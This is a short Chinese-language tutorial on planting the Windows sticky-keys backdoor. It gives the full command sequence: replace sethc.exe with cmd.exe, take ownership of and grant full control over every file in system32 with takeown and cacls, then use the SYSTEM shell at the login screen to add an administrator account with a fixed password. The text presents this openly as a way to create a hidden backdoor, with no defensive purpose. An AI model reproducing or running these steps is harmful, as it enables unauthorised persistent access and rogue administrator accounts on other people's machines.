Windows的粘滞键------C:\windows\system32\sethc.exe，它本是为不方便按组合键的人设计的

Windows系统按5下shift后，Windows就执行了system32下的sethc.exe，也就是启用了粘滞键

 在进程里可以看到是以当前用户的权限运行

但是当我们未登陆系统(停留在登陆界面)的时候 系统还不知道我们将以哪个用户登陆,所以在这个时候连续按5次shift后的话系统将会以system用户(具有管理员级别的权限)来运行sethc.exe这个程序

我们可以把cmd.exe这个程序更名称sethc.exe并且把原来的sethc.exe替换掉

在登陆界面的时候我们连续按下5吃shift键系统以system权限就会运行我们的CMD.exe

那么我们的cmd.exe就具有了管理员权限了 如此一来 我们只要利用CMD加一个管理员用户就可以登陆进去，实现隐藏后

门。

其制作有很多种，下面介绍一种最简单的，可以明白其原理自己扩展

在命令行执行（需要一定的权限）

copy C:\WINDOWS\system32\cmd.exe C:\windows\system32\sethc.exe   

直接吧cmd.exe复制替换成sethc.exe  文件

发现拒绝访问：

出现这样的情况我们就需要将将权限目录下的所有文件及文件夹、子文件夹下的所有者更改为管理员组(administrators)命令，要不然复制不进去。

注销，尝试登陆界面直接运行出系统权限的cmd命令。

takeown /f c:\windows\system32\*.*   /a /r /d y

cacls  c:\windows\system32\*.*  /T /E /G administrators:F

目录下的文件、子文件夹的NTFS权限修改为仅管理员组(administrators)完全控制

然后系统文件夹权限。

如果提权后是system权限，需要在转化

cacls  c:\windows\system32\*.*  /T /E /G system:F

现在可以用管理员权限访问了

然后注销用户到登陆界面按5下shift键调用起来shift后门

可以通过命令添加为管理员登陆

net user gkk 123456 /add 

net localgroup administrators gkk /add

这个命令行存在时间限制，所以要快速输入命令，达到添加用户的目的。然后输入添加的账户gkk密码123456直接登陆。